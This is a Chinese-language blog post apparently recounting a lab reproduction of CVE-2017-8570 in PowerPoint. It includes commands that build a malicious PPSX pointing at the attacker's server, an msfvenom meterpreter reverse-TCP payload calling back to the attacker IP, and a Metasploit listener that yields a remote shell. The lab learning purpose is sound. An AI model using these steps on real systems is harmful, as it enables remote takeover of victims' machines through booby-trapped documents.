最近在学习kali的相关使用,朋友说不如就复现cve-2017-8570吧,我欣然答应。


0x00介绍 CVE-2017-8570是一个逻辑漏洞,成因是Microsoft PowerPoint执行时会初始化“script”Moniker对象,而在PowerPoint播放动画期间会激活该对象,从而执行sct脚本(Windows Script Component)文件。攻击者可以诱导用户运行恶意PPT文件,便可获取和当前登陆用户相同的执行权限,该漏洞利用方法简单影响范围广。 0X01影响版本 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 (32-bit editions) Microsoft Office 2010 Service Pack 2 (64-bit editions) Microsoft Office 2013 RT Service Pack 1 Microsoft Office 2013 Service Pack 1 (32-bit editions) Microsoft Office 2013 Service Pack 1 (64-bit editions) Microsoft Office 2016 (32-bit edition) Microsoft Office 2016 (64-bit edition) 0x02复现 攻击者 操作系统:kali2018 IP:192.168.40.22 受害者 操作系统:win7 x64(office 2007) IP:192.168.40.159

  1. 我们下载好利用的exp之后,解压打开里面的README.md。进入文件目录输入:cat README.md里面详细讲了操作步骤,讲真readme真的好用。如图:注意图中红框中的ip地址,均为攻击者的ip地址。
  2. 按照上图步骤进行第一步:生成恶意的PPSX文件 python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://192.168.40.22/logo.doc
  3. 第二步:生成反弹shell的exe文件,注意这里要是是64位系统,需要在windows后面加x64 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.40.22 LPORT=4444 -f exe > /var/www/html/shell.exe
  4. 第三步:开启msf的监听
  5. 第四步:生成监听来自ppsx执行反弹shell,自动开启80端口,注意这里的shell文件路径要和之前生成的文件路径一样。不过在进行这一步之前,我先将生成的Incoice.ppsx文件移到/var/www/html下,然后开启Apache服务,本机访问192.168.40.22/Incoice.ppsx,将恶意文件下载下来,随后关闭Apache服务。 此时这里已经可以看到received request for payload from 192.168.40.159,因为我是运行恶意文件之后截的图。
  6. 受害者打开ppsx文件,即可看到成功反弹shell。期间失败过,shell反弹不了,第二天再试的时候就好了,具体原因就归类于自己粗心吧~~~ 到此为止就已经成功复现该漏洞了。细心+不放弃=成功!